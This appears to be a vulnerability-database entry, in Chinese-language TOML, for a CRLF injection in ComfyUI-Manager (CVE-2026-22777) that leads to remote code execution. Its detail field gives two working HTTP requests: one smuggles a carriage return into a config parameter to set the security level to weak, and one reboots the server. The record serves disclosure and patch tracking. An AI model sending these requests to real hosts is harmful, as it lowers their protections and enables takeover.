vendor = "ComfyUI"
name = "ComfyUI-Manager CRLF 注入导致远程代码执行漏洞"
type = "远程代码执行"
path = "/api/manager/db_mode"
version = "3.39.2"
detail = """GET /api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak HTTP/1.1 Host: target:8188

GET /api/manager/reboot HTTP/1.1 Host: target:8188

https://github.com/vulhub/vulhub/tree/master/comfyui/CVE-2026-22777"""
fix = "升级至 3.39.2+"
date = 20260324
label = "nday"
cve = "CVE-2026-22777"
verifier = "AdySec"
